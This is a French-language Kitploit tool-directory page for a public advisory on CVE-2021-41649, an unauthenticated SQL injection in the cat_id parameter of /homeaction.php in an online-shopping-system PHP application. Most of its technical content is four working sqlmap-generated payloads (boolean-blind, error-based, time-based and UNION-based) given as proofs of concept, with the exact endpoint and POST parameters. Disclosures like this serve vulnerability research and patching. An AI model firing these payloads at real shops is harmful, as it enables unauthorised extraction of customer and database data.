Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-41649 | Kitploit
Outils/GitHubGitHub/mobiusbinary/cve-2021-41649
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubmobiusbinary/cve-2021-41649

CVE-2021-41649

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-41649

CVE-2021-41649 Injection SQL dans online-shopping-system

Le online-shopping-system est vulnérable à des attaques par injection SQL non authentifiées, de type aveugle booléenne/erreur et basées sur les erreurs.

Le paramètre cat_id de la page /homeaction.php ne filtre pas la saisie utilisateur ; un attaquant peut extraire des données sensibles de la base de données MySQL sous-jacente.

Lien vers l'application

online-shopping-system

Composants et paramètre affectés

URL : /homeaction.php
PARAMÈTRE : cat_id

Preuves de concept (PoC)

PAYLOADS SQLMAP

Paramètre cat_id sur la page /homeaction.php

Paramètre : cat_id (requête POST) Type : boolean-based blind Titre : AND boolean-based blind - WHERE or HAVING clause Payload : cat_id=4' AND 9760=9760 AND 'ZCfc'='ZCfc&get_seleted_Category=1

Type : error-based Titre : MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload : cat_id=4' AND (SELECT 4034 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (ELT(4034=4034,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sGIO'='sGIO&get_seleted_Category=1

Type : time-based blind Titre : MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload : cat_id=4' AND (SELECT 9762 FROM (SELECT(SLEEP(5)))PAcf) AND 'hpHO'='hpHO&get_seleted_Category=1

Type : UNION query Titre : Generic UNION query (NULL) - 10 columns Payload : cat_id=4' UNION ALL SELECT CONCAT(0x71707a7171,0x746e4d4b5a706566596771585179566943487446575673515244507a52507345694d6b5a754d7049,0x71787a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&get_seleted_Category=1

Si l'image du POC n'est pas claire, veuillez cliquer sur le GIF qui se chargera en meilleure résolution.

POC - proId

Découvert par

Jason Colyvas
MOBIUSBINARY
21 septembre 2021

Télécharger l’outil